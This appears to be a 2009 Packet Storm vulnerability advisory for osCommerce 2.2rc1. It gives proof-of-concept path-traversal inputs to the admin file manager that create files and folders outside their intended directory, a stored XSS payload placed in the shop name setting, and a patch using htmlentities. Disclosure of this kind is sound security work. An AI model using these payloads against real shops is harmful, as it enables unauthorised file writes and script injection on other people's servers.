osCommerce 2.2rc1 Creation / Cross Site Scripting

2009-03-09T00:00:00
ID PACKETSTORM:75536
Type packetstorm
Reporter Jonathan Salwan
Modified 2009-03-09T00:00:00

Description

                                        
                                            `#####################################################################################################  
#  
# Module : osCommerce  
# Version : 2.2rc1  
# Edited by : oscommerce.com/  
# Download : http://www.oscommerce.com/  
# Download(fr) : http://www.oscommerce-fr.info/portail/index.php?option=com_remository&Itemid=183  
#  
# Vulnerability : Multiple Vulnerability  
#  
# Author : Jonathan Salwan  
# Mail : submit [AT] shell-storm.org  
# Web : http://www.shell-storm.org  
#  
####################################################################################################  
# Create file on the server   
# Proof of Concept  
####################################################################################################  
#   
# File : catalog/admin/file_manager.php  
# Code (row 146):   
#   
# if ($action == 'new_file') {  
# $filename_input_field = tep_draw_input_field('filename');  
#   
# Use vul:  
# --------  
# http://localhost/catalog/admin/file_manager.php?action=new_file  
# file name => ../../../../../../../../file.txt  
#   
####################################################################################################  
# Create folder on the server   
# Proof of Concept  
####################################################################################################  
#  
# File : catalog/admin/file_manager.php  
# Code (row 296):   
#  
# $contents[] = array('text' => '<br>' . TEXT_FILE_NAME . '<br>' . tep_draw_input_field('folder_name'));  
#  
# Use vul:  
# --------  
# http://localhost/catalog/admin/file_manager.php?action=new_folder  
# folder name => ../../../../../../../../folder_test  
#  
####################################################################################################  
# XSS Vulnerability Proof of Concept   
####################################################################################################  
#  
# File : catalog/admin/index.php  
# Code (row 58) :  
#  
# <td class="pageHeading"><?php echo STORE_NAME; ?></td>  
#  
#  
# Use vul:   
# --------  
# http://localhost/catalog/admin/configuration.php?gID=1&cID=1&action=edit  
# Shop Name => <script>alert('xss');</script>  
#  
####################################################################################################  
# PATCH catalog/admin/index.php  
####################################################################################################  
#  
# replaces code : <td class="pageHeading"><?php echo STORE_NAME; ?></td>  
# to : <td class="pageHeading"><?php echo htmlentities(STORE_NAME); ?></td>  
#  
#  
`